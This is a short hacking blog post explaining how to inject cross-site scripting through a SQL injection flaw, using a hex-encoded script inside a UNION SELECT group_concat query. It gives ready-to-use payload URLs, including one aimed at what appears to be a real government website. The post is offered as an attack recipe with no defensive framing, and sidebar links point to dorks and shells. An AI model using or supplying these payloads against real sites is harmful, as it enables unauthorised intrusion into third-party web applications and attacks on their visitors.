XSS Injection Via SQLi Vulnerability

XSS Injection Via SQLi Vulnerability | Juno_okyo's Blog

# XSS Injection Using SQL Injection Vulnerability
# Trick is based on Hexa Decimal Encoding.

[0x01] You got SQLi vulnerability in website
http://www.vulnerable.com/index.php?id=560

[0x02] Next count the columns. You got 5 columns and column 3 is
vulnerable.
[0x03] Next encode your JavaScript to HexaDecimal value.
Eg. <script>alert("Ajith 'n Ajmal")</script> 's hexa decimal value is

3c7363726970743e616c6572742822416a69746820276e20416a6d616c22293c2f7363726970743e

[0x04] Insert the hexa decimal value into group_concat function.
That is now use URL

www.vulnerable.com/index.php?id=560+UNION+SELECT+1,2,group_concat(0xhexadecimalvalue),4,5

Eg. http://www.commerce.gov.pk/ptmaview.php?ID=-32%20union%20select%201,2,3,group_concat%280x3c7363726970743e616c65727428224a756e6f5f6f6b796f277320426c6f6722293c2f7363726970743e%29,5,6,7,8,9,10,11,12,13,14

Leader at J2TEAM. Website: https://j2team.dev/

Juno_okyo's Blog

XSS Injection Via SQLi Vulnerability

Đăng nhận xét

J2TEAM Cookies - Chia sẻ tài khoản mà không sợ lộ mật khẩu

PhpFox 3.0.1 Cross Site Scripting (XSS)

Hướng dẫn bảo vệ bạn chống lại các Hacker

Google Hacking DataBase (GHDB)

2012 Dorks & Shell